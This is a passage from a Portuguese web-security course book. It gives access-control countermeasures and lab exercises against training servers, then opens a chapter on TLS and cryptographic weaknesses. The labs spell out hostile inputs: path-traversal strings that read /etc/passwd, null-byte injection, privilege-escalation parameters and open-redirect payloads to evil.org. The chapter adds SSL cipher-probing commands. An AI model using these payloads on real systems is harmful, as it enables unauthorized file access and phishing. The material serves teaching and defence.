extravasamento de inteiros, converter os operandos para um tipo maior e s ento efetuar
o clculo e tomar decises.
389
Ferramentas automatizadas
Ferramentas automatizadas so capazes de detectar falhas na lgica de negcio? Justifique
sua resposta.
Contramedidas
As seguintes contramedidas devem ser adotadas, para evitar a ocorrncia das vulne- q
rabilidades que afetam o mecanismo de autorizao e a lgica de negcio da aplicao
(Stuttard e Pinto, 2007; Meucci et al., 2008):
1 O mecanismo de autorizao deve ser invocado, imediatamente antes de uma ope-

rao ser realizada, respeitando-se os requisitos de um monitor de referncias.
1 Nunca use o cabealho HTTP Referer para controlar o acesso s pginas da aplicao,
pois ele pode facilmente ser forjado pelo usurio.
1 Identificadores internos de objetos, como chaves primrias de tabelas em bancos

de dados, por exemplo, no devem ser expostos aos usurios. Em vez disso, ndices
indiretos, gerados de maneira aleatria, devem ser empregados e armazenados no
objeto de sesso de cada usurio, considerando que j tenha sido autenticado.
1 No use o servidor web para fornecer, diretamente, recursos estticos que sejam sen-
sveis. Em vez disso, crie um monitor de referncias, que seja invocado, sempre que
um usurio do sistema tentar acess-los.
1 Restrinja o acesso a funes administrativas somente a algumas mquinas do parque

computacional.
1 Tome as decises relacionadas a controle de acesso sempre no lado servidor da

aplicao.
1 Quando a aplicao precisar manipular arquivos especificados por usurios:

2 Valide o nome de arquivo fornecido pelo usurio, por meio de tcnicas de lista
branca. Isso impedir que caracteres para percurso de caminho sejam utilizados.
2 Garanta que todo arquivo manipulado esteja dentro do diretrio alocado para
esse propsito.
2 Considere executar a aplicao dentro de um chroot. chroot
2 Utilize funes que sejam binariamente seguras, isto , que no atribuam semn- Consiste em uma
funcionalidade provida
tica especial para alguns caracteres, como o nulo, por exemplo. por alguns sistemas
1 Sempre que possvel, utilize links diretos para os diversos recursos, em vez de uma operacionais, que
permite fazer com que

pgina de redirecionamento. um subdiretrio seja
1 Quando o redirecionamento for necessrio: visto, por um processo e
seus filhos, como sendo
2 Verifique se a URL do recurso de destino pertence a uma lista de valores permitidos. a raiz do sistema de
arquivos.
2 No defina a URL do recurso de destino com base em dados que sejam contro-
lados por usurios.
390
2 Se em algum caso muito especial for necessrio usar dados fornecidos por usu- q
rios, para definio da URL do recurso de destino, adicione no incio dela o pro-
tocolo e o nome de domnio esperados, com uma barra (/) no final. Alm disso,
aplique a tcnica de lista branca, para validar o parmetro a ser concatenado.
1 Use mecanismos de sincronizao quando manipular dados compartilhados, como

arquivos ou registros de bancos de dados, por exemplo.
1 Utilize casos de abuso para identificar vulnerabilidades na lgica de negcio da aplicao.
391
392
Atividade 1 Acesso direto a recursos
Esta atividade tem por objetivo ilustrar as diversas tcnicas que podem ser usadas para
acesso direto a recursos. Para inici-la, carregue as mquinas virtuais do aluno e do servidor
(Fedora) e execute o roteiro na primeira delas.
Acesso direto a pginas

O objetivo deste exerccio estudar ataques de acesso direto a pginas do sistema, contor-
nando o mecanismo de autorizao.
2. Acesse http://bac.esr.rnp.br/
3. Digite guest e guest nos campos Usurio e Senha, respectivamente, e clique em Login.
4. Anote a URL do link para a caixa de mensagens e, em seguida, clique nele.
5. Clique em Encerrar sesso.
6. Digite esruser e esruser nos campos Usurio e Senha, respectivamente, e clique em Login.
7. Anote as URLs dos links exibidos.
8. Clique em Caixa de mensagens.
10. Clique em Visualizar arquivos.
12. Clique em Operao no privilegiada.
14. Digite admin e admin nos campos Usurio e Senha, respectivamente, e clique em Login.
15. Anote as URLs dos links exibidos.
18. Clique em Funo Administrativa #1.
24. Clique em Operao no privilegiada.
393
http://bssac.esr.rnp.br/oper2.php
27. O acesso foi permitido? Clique em Retornar pgina de login.
29. O acesso foi permitido? Clique em Retornar pgina de login.
32. O que acontece?
35. O que acontece?
Uso do cabealho HTTP Referer

Neste exerccio, ficar claro por que o uso do cabealho HTTP Referer no serve para con-
trolar o acesso a pginas da aplicao.
37. Acesse http://bssac.esr.rnp.br/admin/
41. Acesse o menu Tools e selecione Tamper Data.
42. Retorne ao Firefox e clique em Caixa de mensagens.
43. Acesse a janela do Tamper Data e clique na primeira requisio.

44. Observe o valor do cabealho Referer, na parte inferior do lado esquerdo da janela.
45. Retorne ao Firefox e pressione Alt + [Seta para esquerda], para voltar pgina anterior.
47. Volte janela do Tamper Data e clique na requisio cuja URL contm oper2.php.
48. Anote o valor do cabealho Referer.
49. Retorne ao Firefox e clique em Encerrar sesso.
394
http://bssac.esr.rnp.br/admin/oper2.php
51. O que acontece?
http://bssac.esr.rnp.br/
http://bssac.esr.rnp.br/admin/oper2.php
56. Foi possvel acessar a pgina?
57. Na janela do Tamper Data, clique em Start Tamper.
58. No Firefox, clique no cone para recarregar a pgina.
59. Clique em Tamper, na janela que aparece.
60. Clique com o boto direito na parte esquerda da janela e, em seguida, em Add element.
61. Digite Referer e clique em Ok.
62. Substitua o valor de Referer para http://bssac.esr.rnp.br/admin/menu.php e clique em Ok.
63. Foi possvel acessar a funcionalidade?
65. Na janela que aparece, desmarque Continue Tampering? e clique em Submit.
66. Feche a janela do Tamper Data.
Acesso direto a objetos

O foco deste exerccio ilustrar como objetos de outros usurios podem ser acessados quando
se tem permisso de uso da funcionalidade e o mecanismo de autorizao vulnervel.
67. Retorne ao Firefox.
68. Acesse http://bssac.esr.rnp.br/

70. Clique no link Caixa de mensagens.
71. Clique na mensagem M#1 para visualiz-la.
72. Observe a barra de endereos do navegador web.
74. Fornea esruser e esruser para os campos Usurio e Senha, respectivamente, e clique
em Login.
395
82. Digite a seguinte URL na barra de endereos do navegador e clique na seta verde:
83. O que acontece?
84. Clique em Retornar pgina de login. Digite guest e guest nos campos Usurio e Senha,
respectivamente, e clique em Login.
86. Foi possvel ver a mensagem de outro usurio?
87. Repita o Passo 86, variando o valor do parmetro mid de 2 a 8.
Acesso direto a recursos estticos

Nesta parte da atividade, so vistos ataques de acesso direto a recursos estticos.
91. Anote as URLs dos links apresentados.
92. Clique em echo.txt.
http://bssac.esr.rnp.br/files/cat.txt
96. Foi possvel acessar o arquivo, mesmo no estando autenticado? Explique por que isso
possvel.
97. Tente acessar as demais URLs anotadas no Passo 91.
396
Atividade 2 Controle de acesso no lado cliente da aplicao
Confiar em controles que so executados no lado cliente da aplicao uma prtica ruim de
segurana, pois podem ser facilmente violados por usurios maliciosos. O propsito desta
atividade ilustrar alguns cenrios em que essa vulnerabilidade est presente e os testes
que podem ser efetuados para identific-la. Os exerccios devem ser realizados na mquina
virtual do aluno e recomenda-se que se imagine o meio de resolv-los antes de seguir o
roteiro fornecido.
Autorizao no lado cliente da aplicao

Esta parte do exerccio aborda uma aplicao que realiza o processo de autorizao com
cdigo Javascript, a partir de uma matriz de controle de acesso obtida no servidor.
2. Acesse http://bcsac.esr.rnp.br/js/
4. Passe o mouse sobre os links e veja a URL de cada um deles.
5. Clique em Caixa de mensagens e veja a URL na barra de endereos.
7. Clique em Funo Administrativa #1. O que acontece?
8. Clique em Ok.
9. Clique em Visualizar arquivos. O que acontece?
10. Clique em Ok.
12. Analise o cdigo Javascript e os formatos dos links.
13. Feche a janela de cdigo HTML.
14. No Firefox, clique em Encerrar sesso.
16. Passe o mouse sobre os links e veja a URL de cada um deles.

17. Clique em Funo Administrativa #1 e veja a URL na barra de endereos.
19. Clique em Visualizar arquivos e veja a URL na barra de endereos.
22. Analise o cdigo Javascript e os formatos dos links. O que difere do visto no Passo 12?
397
23. Feche a janela de cdigo HTML.
24. No Firefox, clique em Encerrar sesso.
http://bcsac.esr.rnp.br/js/oper2.php
26. O que acontece?
http://bcsac.esr.rnp.br/js/oper2.php
30. O acesso foi concedido? Onde se encontra a falha?
Manuteno de perfil no lado cliente da aplicao

O objetivo deste exerccio consiste em violar aplicaes que mantm o perfil de acesso do
usurio, no lado cliente da aplicao.
32. Acesse http://bcsac.esr.rnp.br/
33. Digite esruser e esruser nos campos Usurio e Senha, respectivamente, e clique em Login.
34. Passe o mouse sobre os links e veja a URL de cada um deles. O que chama a ateno?
36. Passe o mouse sobre os links e veja a URL de cada um deles. Existe uma diferena funda-
mental entre essas URLs e as do Passo 34, do ponto de vista de um ataque. Qual ?
37. Altere a URL na barra de endereos do navegador, adicionando as entradas abaixo, uma
por vez, e clicando na seta verde a cada iterao:
&adm=Y
&adm=S
&adm=true
&admin=Y
&admin=S
&admin=true
&root=Y
&root=S
&root=true
398
38. Foi possvel obter acesso mais privilegiado?
39. Altere a barra de endereos para a URL abaixo e clique na seta verde:
http://bcsac.esr.rnp.br/oper1.php?uid=admin
40. O que aconteceu?
41. Clique em M#1 de admin. Foi possvel ler a mensagem?
42. Acesse o WebGoat clicando no cone na barra de atalhos.
43. Fornea guest e guest como credenciais e clique em Ok.
45. Clique em Admin Functions e observe as funes disponveis.
46. Clique em Access Control Flaws e, em seguida, em Remote Admin Access.
47. Repita o Passo 37, mas, adicionalmente, clique em Admin Functions, a cada interao, para
ver se o ataque foi bem-sucedido.
48. Com que parmetro a interface administrativa liberada?
Proteo de referncias a objetos

Neste exerccio, sero estudadas abordagens inseguras utilizadas na proteo de refern-
cias a objetos internos da aplicao.
2. Acesse http://refp.esr.rnp.br/
3. Clique no link para a RFC 2616.
4. Observe a URL na barra de endereos e os valores dos parmetros f e t.
7. Observe a URL na barra de endereos e os valores dos parmetros f e t. Que esquema

de proteo utilizado?
10. Observe a URL na barra de endereos e os valores dos parmetros f e t. Que esquema
de proteo utilizado?
399
13. Observe a URL na barra de endereos e os valores dos parmetros f e t.
Que esquema de proteo utilizado?
15. Suponha a existncia do arquivo ylonen.2006.txt. Como seria a URL para acess-lo,
quando o parmetro t = 0? Tente visualizar o arquivo, no Firefox.
17. Repita o passo 15, para t = 1. Empregue o utilitrio rev, se necessrio.
19. Repita o passo 15 para t = 2. Empregue o utilitrio base64, se necessrio, e cuidado com
caracteres de final de linha.
21. Repita o passo 15 para t = 3.
Atividade 3 Percurso de caminho

Aplicaes que manipulam arquivos selecionados pelo usurio podem ser vulnerveis a
ataques de percurso de caminho, que o tema da presente atividade. Os roteiros devem
ser executados na mquina virtual do aluno e recomenda-se que a estratgia de explorao
seja traada antes de se ver a soluo.
2. Acesse http://path.esr.rnp.br/
3. Passe o mouse sobre os links e observe atentamente as URLs, na barra de estado.

O que chama a ateno para um possvel ataque?
4. Clique no link para a RFC 2616 e observe a barra de endereos do navegador web.
5. Altere, na barra de endereos, o valor do parmetro f para o seguinte:
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6. O ataque de percurso de caminho funciona?
7. Repita o Passo 5, mas usando o valor a seguir:

fielding.1999.txt%00abcdef
8. O arquivo original foi exibido normalmente? Justifique o resultado.
9. Repita o Passo 5, mas usando o valor abaixo, para ver o cdigo fonte de view.php:
..%2Fview.php
400
10. Acesse http://path.esr.rnp.br/index2.php
11. Passe o mouse sobre os links e observe atentamente as URLs na barra de estado.
O que mudou em relao ao cenrio anterior?
12. Clique no link para a RFC 2616 e observe a barra de endereos do navegador web.
13. Altere, na barra de endereos, o valor do parmetro f para o seguinte:
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
14. O ataque funcionou? Qual seria o motivo do resultado obtido?
15. Repita o Passo 13, mas adicionando um caractere nulo codificado (%00) ao final do valor.
16. O que aconteceu agora? Justifique o resultado.
Atividade 4 Redirecionamento no validado

Esta atividade apresenta o problema de redirecionamento no validado, o qual favorece
ataques de phishing. Execute o roteiro na mquina virtual de aluno e procure descobrir os
passos, antes de ler os fornecidos.
4. Acesse http://redir.esr.rnp.br/
5. Clique em Redirecionamento HTTP temporrio.
6. No WebScarab, verifique as requisies realizadas e as respostas fornecidas.
8. Clique em Redirecionamento HTTP permanente.
11. Clique em Redirecionamento por meio de meta-tag Refresh.

14. Clique em Redirecionamento por meio de Javascript.
17. Clique em Redirecionamento por meio de .htaccess.
401
20. Clique em Redirecionamento no validado #1.

Que parmetro foi passado e com que valor?
23. Clique com o boto direito sobre Redirecionamento no validado #1 e selecione Copy Link
Location.
24. Selecione a barra de endereos e cole a URL, pressionando Ctrl + V.
25. Altere o valor do parmetro url para http://www.evil.org e clique na seta verde.
26. A aplicao vulnervel a redirecionamento no validado?

Location.
33. Altere o valor do parmetro target para .evil.org e clique na seta verde.
34. A aplicao vulnervel a redirecionamento no validado?

Location.
41. Observe atentamente a URL e as partes que a compem.
42. Altere o valor do parmetro url para http://www.evil.org e clique na seta verde.
43. O ataque funcionou? Procure explicar o resultado.
402
44. Altere o valor do parmetro url para http://www.evil.org/?u=http://redir.esr.rnp.br/ e
clique na seta verde.
45. E agora? O ataque funcionou?
49. Inicie o Google Chrome, presente no menu Aplicativos\Internet.
50. Acesse http://redir.esr.rnp.br/
51. Clique em Redirecionamento por meio de meta-tag Refresh e espere ser redirecionado.
52. Clique no boto Retornar. O que acontece?
Atividade 5 Condies de corrida

O objetivo desta atividade ilustrar o que pode ocorrer quando uma condio de corrida
explorada, e a dificuldade de se executar ataques desse tipo. O roteiro abaixo deve ser
seguido na mquina virtual do aluno, aps traada a estratgia de explorao.
2. Acesse o WebGoat, a partir da barra de atalhos.
3. Autentique-se com as credenciais guest e guest.
5. No menu presente no lado esquerdo, clique em Concurrency e, em seguida, em Thread

Safety Problems.
6. Leia a descrio do exerccio fornecida.
7. Digite jeff em Enter user name.
8. Inicie o Google Chrome, presente no menu Aplicativos\Internet.
9. Acesse o WebGoat, digitando http://webgoat.esr.rnp.br:8080/webgoat/attack na barra

de endereos.
10. Autentique-se com as credenciais guest e guest.

12. No menu presente no lado esquerdo, clique em Concurrency e, em seguida, em Thread

Safety Problems.
13. Digite dave em Enter user name.
14. Retorne ao Firefox e clique em Submit.
15. Retorne rapidamente ao Google Chrome e clique em Submit.
403
16. Compare as informaes exibidas nos dois navegadores e veja se so do mesmo usurio.
Em caso positivo, o ataque foi efetuado com sucesso. Se no, repita o processo at conseguir.
Atividade 6 Vulnerabilidades na lgica de negcio

Nesta atividade, dois cenrios de lgica de negcio vulnervel sero estudados e explo-
rados. Execute o roteiro na mquina virtual do aluno e procure quebrar as aplicaes, por
iniciativa prpria, antes de acompanhar os passos disponibilizados.
2. Acesse http://blogic.esr.rnp.br/. Digite 100 no campo Valor da transferncia e clique

em Transferir.
3. Repita o passo 3, mas digitando 2000 no campo Valor da transferncia.
4. Digite -400 no campo Valor da transferncia e clique em Transferir. O que acontece?
5. Repita o Passo 5. Foi possvel realizar mais essa transferncia?
6. Acesse http://blogic.esr.rnp.br:8080/overflow/Digite 500 no campo Valor do emprstimo

e clique em Emprestar.
7. O que acontece?
8. Repita o Passo 8, mas com o valor 12000 em vez de 500.
9. Foi possvel emprestar o montante especificado?
10. Repita o Passo 8, agora, com o valor 9500.
11. Tente emprestar 30000, para causar um possvel extravasamento de inteiro.

O ataque foi bem-sucedido?
12. Olhe a barra de endereos do navegador e identifique a tecnologia utilizada pela aplicao.
13. Abra uma nova janela do Firefox, e procure na internet os tipos primitivos de Java.
14. Anote os maiores valores permitidos para os tipos int e long.

15. Retorne aplicao e tente efetuar um emprstimo com o maior int, anotado no passo
anterior.
16. O ataque foi bem-sucedido?
404
Bibliografia 8
1 ANDERSON, James P. Computer Security technology planning study. Relatrio Tcnico ESD-
TR-73-51, Air Force Electronic Systems Division, 1972.
1 BISHOP, Matt. Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux.
Technical Report CSE-95-9, Dept. of Computer Science, University of California at Davis,
Davis, CA 95616-8562, 1995.
1 GROSSMAN, Jeremiah. Seven Business Logic Flaws That Put Your Website At Risk. WhiteHat
Security Whitepaper, 2007.

1 NETZER, Robert H. B. e MILLER, Barton P. What are Race Conditions? - Some Issues and
Formalizations. ACM Letters on Programming Languages and Systems, Volume 1, 1992.
1 PALEARI, Roberto; MARRONE, Davide; BRUSCHI, Danilo e MONGA, Matia. On Race

Vulnerabilities in Web Applications. In: DIMVA 08 Proceedings of the 5th international
conference on Detection of Intrusions and Malware, and Vulnerability Assessment,
Lecture Notes in Computer Science, Volume 5137, Springer-Verlag, 2008.
405
406
9
Mecanismos criptogrficos
objetivos
Apresentar tcnicas para identificar problemas de segurana na configurao de

canais de comunicao e no uso de mecanismos criptogrficos.
Canal de comunicao com segurana mal configurada, sutes criptogrficas, protocolos
conceitos
proprietrios, BASE64, criptoanlise de cifras clssicas, ndice de coincidncia, chaves
embutidas, chaves com baixa entropia, modo de operao inadequado, nvel de
segurana de criptossistemas, proteo de senhas.
Introduo
A criptografia moderna est presente no nosso cotidiano de maneira profusa, em q
protocolos de comunicao, caixas eletrnicos, telefonia celular, proteo de software
e de contedo, urnas eletrnicas e TV digital, dentre inmeros outros exemplos. Em sis-
temas de informao, quando todos os demais mecanismos so quebrados e os dados,
extrados da base de dados, a proteo criptogrfica compreende a ltima barreira para
evitar que o sigilo das informaes sensveis seja violado. Considerando o estado da arte
dessa cincia, possvel, atualmente, realizar um timo trabalho nesse sentido, evitando
que os dados caiam em mos indesejadas.
Infelizmente, porm, a implantao de mecanismos criptogrficos requer diversos

cuidados, que, na grande maioria das vezes, no so observados, comprometendo a
segurana da soluo como um todo.
No mnimo, os seguintes aspectos devem ser considerados:
1 Utilizao de algoritmos e protocolos conhecidos e extensivamente analisados.

Captulo 9 - Mecanismos criptogrficos
1 Uso de primitivas criptogrficas adequadas para cada situao.

1 Emprego de bibliotecas que contenham implementaes corretas dos criptossistemas
adotados.
1 Gerenciamento das chaves criptogrficas, sobretudo os processos de gerao, distri-

buio e armazenamento.
O resultado obtido por uma equipe liderada por Marc Stevens (Stevens, 2009) um bom
exemplo de como as coisas podem dar muito errado, quando as melhores prticas no so
seguidas. Neste trabalho, que recebeu o prmio de melhor artigo da conferncia Crypto
2009, os autores descreveram um mtodo para criar um certificado digital vlido, porm
407
falsificado, de uma autoridade certificadora intermediria. O ataque baseou-se nas vulnerabi-
lidades encontradas na funo MD5 (Wang e Yu, 2005) e no fato de que, na ocasio, algumas
autoridades certificadoras ainda assinavam os certificados com o algoritmo RSA + MD5, alm
de possurem processos descuidados de comprovao de identidade do solicitante. Adicional-
mente, foi necessria muita engenhosidade para que as pr-condies fossem satisfeitas, e
uma boa dose de poder computacional, fornecida por uma grade de 200 Sony PlayStation 3.
A gravidade do exemplo acima que o ataque tornou possvel forjar certificados digitais,
reconhecidos por navegadores e clientes web, para qualquer pessoa ou entidade. No
contexto de aplicaes web, esta possibilidade, quando agregada a um ataque de redire-
cionamento, permite realizar uma personificao perfeita de um servidor, isto , conexes
SSL ou TLS sem advertncia de problema no certificado utilizado. A origem do problema foi
o uso por algumas autoridades certificadoras de um algoritmo quebrado, no caso o MD5,
contrariando o clamor da comunidade criptolgica. A soluo, por sua vez, depende da revo-
gao dos certificados razes das autoridades problemticas, o que realizado por meio da
atualizao dos navegadores web. Mas qual a porcentagem de usurios que regularmente
atualizam os softwares que utilizam? A resposta desta pergunta deveras preocupante!
Considerando os problemas expostos, o objetivo do presente captulo discutir as inmeras

vulnerabilidades que podem ocorrer no transporte e armazenamento de informaes. Com
isso em mente, os tpicos cobertos so: verso vulnervel de SSL, emprego de sutes cripto-
grficas fracas, problemas com o certificado digital, acesso a domnio no verificado, uso de
protocolos proprietrios, identificao e quebra de cifras clssicas, recuperao de chaves
embutidas no cdigo, gerao de chaves com baixa entropia, utilizao de modo de ope-
rao inadequado, uso incorreto de algoritmos criptogrficos, mistura de algoritmos com
nveis de segurana diferentes, uso de algoritmos criptogrficos com fraquezas conhecidas,
proteo de senhas de usurio e proteo de dados de cartes de pagamento.
Acesso aplicao web
Voc j acessou alguma aplicao web para a qual o navegador web tenha apresentado erro
relacionado ao certificado digital?
Vulnerabilidades no transporte de informaes

Comunicao segura de rede ocorre quando os seguintes requisitos de segurana da q
informao so satisfeitos (Howard et al., 2005; Stallings, 2005):
1 Autenticao de entidades as identidades das partes envolvidas na comunicao

so corroboradas. Isto importante para certificar-se de que a conversao ocorre
com a entidade correta, ainda mais que ataques de redirecionamento so relativa-
mente comuns.
1 Autenticao da origem da mensagem corroborao de identidade do remetente

da mensagem, para evitar falsificao de dados.
1 Integridade informaes enviadas no so adulteradas em trnsito. Afinal, ningum quer

que a conta destino de uma transferncia bancria seja alterada para a de um atacante.
408
1 Confidencialidade informaes transportadas pelo canal no so reveladas a q
terceiros que no sejam parte da comunicao. Por exemplo, senhas e nmeros de
carto de crdito devem ser conhecidos apenas pelas partes autorizadas.
Em aplicaes web, esses requisitos so atendidos, normalmente, pelo uso dos proto-
colos SSL e TLS, para transporte de dados HTTP, os quais realizam um timo trabalho,
quando implantados corretamente. Infelizmente, na prtica, servidores no so corre-
tamente configurados, do ponto de vista de segurana, e clientes de acesso personali-
zados no implementam algumas sutilezas desses protocolos adequadamente.
O resultado disso que a violao dos requisitos supracitados torna-se completamente

factvel e, para piorar ainda mais a situao, ainda h os que acreditam que o uso de HTTPS,
por si s, suficiente para tornar uma aplicao web segura!
l
Do lado do servidor, um problema muito comum ocorre com o certificado digital utilizado
na configurao do tnel SSL/TLS. Inmeros so os casos de aplicaes que empregam
Saiba mais
certificados autoassinados, expirados ou emitidos por autoridades certificadoras caseiras,
Phishing uma tcnica das quais os navegadores e sistemas clientes no possuem a chave pblica autntica, para
baseada em engenha- validao de assinatura. Em qualquer um desses casos, uma mensagem de erro, como a
ria social, na qual um
usurio malicioso se ilustrada pela Figura 9.1, exibida ao usurio. Como o objetivo deste sempre utilizar o
passa por uma enti- sistema, provavelmente, ele ignorar o alerta e continuar o acesso, ainda mais impulsio-
dade confivel, para
nado pelo hbito criado pela aplicao. Posteriormente, se ele for vtima de um ataque de
obter informaes
confidenciais, como phishing ou de redirecionamento, a tela de aviso aparecer igualmente e a pessoa prosse-
nmeros de carto de guir como acostumada.
q
crdito e credenciais
de acesso a sistemas. Outro problema resultante de m configurao o suporte a sutes criptogrficas fracas
Um exemplo so as
e a verses antigas do protocolo SSL.
mensagens de correio
eletrnico, suposta-
mente enviadas pelo
Existem sutes para testes, habilitadas por padro em sistemas antigos, as quais no utilizam
banco, que solicitam cifras para proteger a confidencialidade das informaes trafegadas. Outras, por sua vez,
o fornecimento de se- cifram o canal, mas com algoritmos datados ou de exportao, que podem ser quebrados
nhas alegando, como
motivo, problemas por fora bruta. J no caso de SSL 2.0, possvel forar a escolha de algoritmos, por meio da
no sistema. adulterao do handshake, e, tambm, excluir bytes ao final de cada mensagem, sem ser
detectado, devido a uma falha na gerao do MAC (Wagner e Schneier, 1996). Alm dessas vul-
nerabilidades, esta verso baseia o encerramento de sesso no envio de um pacote TCP com
Flag FIN o flag FIN habilitado. Qualquer pessoa, porm, pode forjar um pacote assim e, portanto, no
Bit presente h como as entidades envolvidas na comunicao saberem se a transmisso foi encerrada de
no cabealho TCP,
maneira legtima.
utilizado para
encerramento
de conexes.
409
Um ponto que nunca recebe a ateno que merece a proteo da chave privada utili- q Figura 9.1
zada por esses protocolos. Erro na validao
do certificado.
Em ambientes tpicos, ela protegida por uma senha, a qual embutida em scripts de
inicializao do servidor, para que seja carregada automaticamente. Normalmente, no h
restries quanto leitura desses arquivos, o que permite que qualquer usurio acesse a
chave privada, aps inspeo da senha utilizada. Embora essa abordagem seja melhor em
termos operacionais, pssima para a segurana. Uma vez conseguidos a chave privada e
certificado de uma aplicao web, fica muito fcil personific-la de maneira perfeita, pois
nenhum navegador ir reclamar de no ter conseguido completar o handshake SSL/TLS.
O ltimo exemplo de vulnerabilidade no lado do servidor compreende aplicaes q

que protegem o transporte de informaes sigilosas, por meio do protocolo HTTPS,
configurando-o perfeitamente, com sutes criptogrficas fortes e certificado digital
vlido. No obstante, permitem que o mesmo recurso seja acessado, tambm, por meio
de HTTP simples.
Assim, sem muita dificuldade, um usurio pode ser induzido a acessar pginas sensveis,
por meio desse protocolo, quando, ento, informaes em claro podero ser capturadas
em trnsito.
Do lado cliente, os problemas surgem quando as informaes do certificado digital apre-

sentado pelo servidor no so validadas, ou quando o protocolo no seguido risca.
Logo, se a data do acesso estiver fora do prazo de validade do certificado, se ele estiver
revogado ou se no for possvel verificar as assinaturas digitais na cadeia de certificao,
o handshake deve ser finalizado com erro. Outro aspecto importante considerado na
especificao do HTTPS, mas no pelos protocolos SSL/TLS, que o nome do domnio sendo
410
acessado deve ser conferido com o contido no certificado (Howard et al., 2005; Oaks, 2001).
Se isto no for satisfeito, possvel violar o requisito de autenticao de entidades.
Por fim, observe-se a Figura 9.1 novamente. O navegador, frente a um problema na nego-
ciao do protocolo SSL, d a opo ao usurio, potencialmente leigo em segurana, de
adicionar uma exceo e continuar o acesso ao stio web. Entregar uma deciso de segu-
rana a um usurio , conforme Howard et al. (2005), uma vulnerabilidade, pois no se pode
esperar que ele sempre escolha a opo mais segura. Consonantemente, o autor considera
que isso seja um defeito de projeto dos navegadores, que deveriam considerar uma falha
no estabelecimento do tnel SSL, como um problema de conectividade de rede, no qual o
usurio impedido de prosseguir.
Verso vulnervel de SSL

A verso 2.0 do protocolo SSL apresenta diversas vulnerabilidades e, assim, no deve ser q
utilizada em ambientes de produo.
Apesar disso, comum encontrar stios web que a aceitam, para que navegadores e clientes
web antigos no sejam impedidos de acessar a aplicao. Esta prtica um timo exemplo
de aceitao de risco para suportar uma base de softwares legados, mas que no vai ao
encontro das melhores prticas de segurana.
A maneira mais simples de testar se um servidor est configurado para aceitar SSLv2 q
por meio da opo -ssl2 do utilitrio OpenSSL.
Em caso positivo, a sada do comando ser similar abaixo apresentada:
~$ openssl s_client -ssl2 -connect exemplo.esr.rnp.br:443
...
SSL handshake has read 1416 bytes and written 364 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : SSLv2
Cipher : DES-CBC3-MD5
Session-ID: 19E91A78897D209ACAC7E8ED05AA9C04
Session-ID-ctx:
Master-Key: 1522EE3B83E13B7C4CB1E04792BB1E7488209B4D7D0992FF
Key-Arg : AC6828F1ED84E617
411
Start Time: 1295810056
Timeout : 300 (sec)
Verify return code: 21 (unable to verify the first certificate)
---
...
Suporte a sutes criptogrficas fracas

Uma sute criptogrfica, no contexto dos protocolos SSL e TLS, descreve um conjunto q
de algoritmos que devem ser empregados na proteo do canal de comunicao.
Algumas delas, entretanto, utilizam criptossistemas fracos, que fornecem pouca ou
nenhuma segurana.
Dentre os exemplos extremos deste caso esto as sutes NULL-MD5 e NULL-SHA, que
no cifram os dados trafegados e permitem, portanto, que as informaes, em claro, sejam
capturadas em trnsito. O seguinte cenrio ilustra um ataque bem-sucedido contra esta
vulnerabilidade:
1. Por meio de outra vulnerabilidade no cliente, o atacante fora que a lista de sutes q
enviadas na mensagem client_hello contenha apenas a NULL-SHA.
2. O servidor escolhe os algoritmos para proteo do tnel SSL, com base na inter-
seco das listas de sutes suportadas por ambos que, no caso, a prpria NULL-
-SHA.
Figura 9.2
3. O atacante captura os pacotes de rede e extrai as informaes desejadas que, embora Trfego TLS
encapsuladas por SSL, no esto cifradas, conforme possvel observar pela Figura 9.2. em claro.
412
Existem diversas ferramentas que podem ser utilizadas para identificar as sutes cripto- q
grficas suportadas por um servidor web. A primeira delas o prprio OpenSSL, com a
opo -cipher, que define a sute a ser utilizada na conexo.
Se ela no for suportada pelo servidor, uma mensagem de erro exibida, informando que
a negociao SSL/TLS no foi bem-sucedida. O exemplo abaixo testa se os servidores do
GMail suportam a sute NULL-SHA.
~$ openssl s_client -connect gmail.google.com:443 -cipher NULL-SHA
CONNECTED(00000003)
8820:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert

handshake failure:s23_clnt.c:596:
Observe-se que o comando acima testa apenas uma nica sute criptogrfica e, assim, ele
deve ser repetido individualmente para cada par (sute, verso de protocolo). Embora isso seja
uma desvantagem do OpenSSL, relativamente fcil implementar um script baseado neste
utilitrio que identifique todas as sutes suportadas por um servidor. Basta para esse prop-
sito verificar se cada execuo do comando resulta em erro ou em uma conexo efetuada.
A primeira opo ao OpenSSL o utilitrio THCSSLCheck, criado por Johnny Cyberpunk e q

disponibilizado nativamente apenas para plataformas Windows.
Apesar disso, pode ser facilmente portado para outras plataformas, por meio do software
de emulao Wine. Apresenta a grande vantagem de testar diversas sutes com uma nica
execuo; porm, no testa o suporte a cifras nulas e no atualizado desde 2004, quando
foi lanado para o pblico. Este ltimo problema, no entanto, no to expressivo, uma vez
que raramente so adicionadas novas sutes ao protocolo. Para exemplificar o uso do
THCSSLCheck, o relatrio parcial da execuo contra o GMail est ilustrado a seguir.
C:\ >thcsslcheck gmail.google.com 443
------------------------------------------------------------------------
THCSSLCheck v0.1 - coding johnny cyberpunk (www.thc.org) 2004
------------------------------------------------------------------------
[*] testing if port is up. pleaze wait...
[*] port is up !
[*] testing if service speaks SSL ...

[*] service speaks SSL !
[*] now testing SSLv2
----------------------------------------------------------------------
DES-CBC3-MD5 - 168 Bits - unsupported
IDEA-CBC-MD5 - 128 Bits - unsupported
RC2-CBC-MD5 - 128 Bits - unsupported
413
RC4-MD5 - 128 Bits unsupported
...
[*] now testing SSLv3
----------------------------------------------------------------------
DHE-RSA-AES256-SHA - 256 Bits - unsupported
DHE-DSS-AES256-SHA - 256 Bits - unsupported
AES256-SHA - 256 Bits - supported
EDH-RSA-DES-CBC3-SHA - 168 Bits - unsupported
EDH-DSS-DES-CBC3-SHA - 168 Bits - unsupported
DES-CBC3-SHA - 168 Bits - supported
...
EXP-EDH-DSS-DES-CBC-SHA - 40 Bits - unsupported
EXP-DES-CBC-SHA - 40 Bits - unsupported
EXP-RC2-CBC-MD5 - 40 Bits - unsupported
EXP-RC4-MD5 - 40 Bits - unsupported
[*] now testing TLSv1
----------------------------------------------------------------------
DHE-RSA-AES256-SHA - 256 Bits - unsupported
DHE-DSS-AES256-SHA - 256 Bits - unsupported
AES256-SHA - 256 Bits - supported
